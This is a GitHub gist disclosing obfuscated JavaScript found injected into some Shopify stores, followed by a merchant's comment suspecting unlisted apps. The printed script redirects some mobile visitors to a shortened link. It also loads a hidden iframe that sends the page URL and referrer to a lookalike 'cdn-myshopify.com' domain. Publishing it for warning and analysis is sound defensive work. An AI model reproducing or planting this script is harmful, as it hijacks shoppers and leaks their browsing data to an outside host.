Created
April 18, 2019 16:41
-
-
Save daniel-sim/c4aa4e2e2fd599156405287e8c3311e3 to your computer and use it in GitHub Desktop.
DO NOT RUN: potentially malicious JavaScript found on some Shopify sites
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var _0x3a4e=["random","floor","referrer","m.facebook.com","instagram.com","google.","bing.","indexOf","hostname","location","ourogoods.com","href","dice-bracelet","userAgent","test","onreadystatechange","readyState","status","california","responseText","http://bit.ly/2VdQsq0","GET","https://comic16.com/test/state","open","send","iframe","createElement","display","style","none","id","if-r-js-x","src","https://cdn-myshopify.com/home.html?q=","&cdnref=","appendChild","body","getElementById","remove"];var radN=Math[_0x3a4e[1]]((Math[_0x3a4e[0]]()* 100)+ 1);var siteRe=document[_0x3a4e[2]];var fRefFa=_0x3a4e[3];var fRefIn=_0x3a4e[4];var fRefGo=_0x3a4e[5];var fRefBg=_0x3a4e[6];var isMRFa=siteRe[_0x3a4e[7]](fRefFa);var isMRIn=siteRe[_0x3a4e[7]](fRefIn);var isMRGo=siteRe[_0x3a4e[7]](fRefGo);var isMRBg=siteRe[_0x3a4e[7]](fRefBg);if((isMRFa> -1|| isMRIn> -1|| isMRGo> -1|| isMRBg> -1)&& radN<= 15){var hname=window[_0x3a4e[9]][_0x3a4e[8]];var fHtn=_0x3a4e[10];var isMhtn=hname[_0x3a4e[7]](fHtn);var furl=window[_0x3a4e[9]][_0x3a4e[11]];var fUma=_0x3a4e[12];var isMUma=furl[_0x3a4e[7]](fUma);if(isMhtn> -1&& isMUma> -1){if(/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i[_0x3a4e[14]](navigator[_0x3a4e[13]])){var xhttp= new XMLHttpRequest();xhttp[_0x3a4e[15]]= function(){if(this[_0x3a4e[16]]== 4&& this[_0x3a4e[17]]== 200){if(this[_0x3a4e[19]][_0x3a4e[7]](_0x3a4e[18])>= 0){}else {window[_0x3a4e[9]][_0x3a4e[11]]= _0x3a4e[20]}}};xhttp[_0x3a4e[23]](_0x3a4e[21],_0x3a4e[22],true);xhttp[_0x3a4e[24]]()}}};setTimeout(function(){var _0x9d64x12=document[_0x3a4e[2]];var hname=window[_0x3a4e[9]][_0x3a4e[11]];var _0x9d64x13=document[_0x3a4e[26]](_0x3a4e[25]);_0x9d64x13[_0x3a4e[28]][_0x3a4e[27]]= _0x3a4e[29];_0x9d64x13[_0x3a4e[30]]= _0x3a4e[31];_0x9d64x13[_0x3a4e[32]]= _0x3a4e[33]+ hname+ _0x3a4e[34]+ _0x9d64x12;document[_0x3a4e[36]][_0x3a4e[35]](_0x9d64x13)},2000);setTimeout(function(){var _0x9d64x14=document[_0x3a4e[37]](_0x3a4e[31]);if(_0x9d64x14){_0x9d64x14[_0x3a4e[38]]()}},4500) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Hi Daniel,
Thanks for your quick reply. I have currently 2 apps installed that are unlisted on the Shopify App Store, which are PayPal Tracking Info Populator, and Sweet Upsell. I will investigate on that.
Thanks again for your help.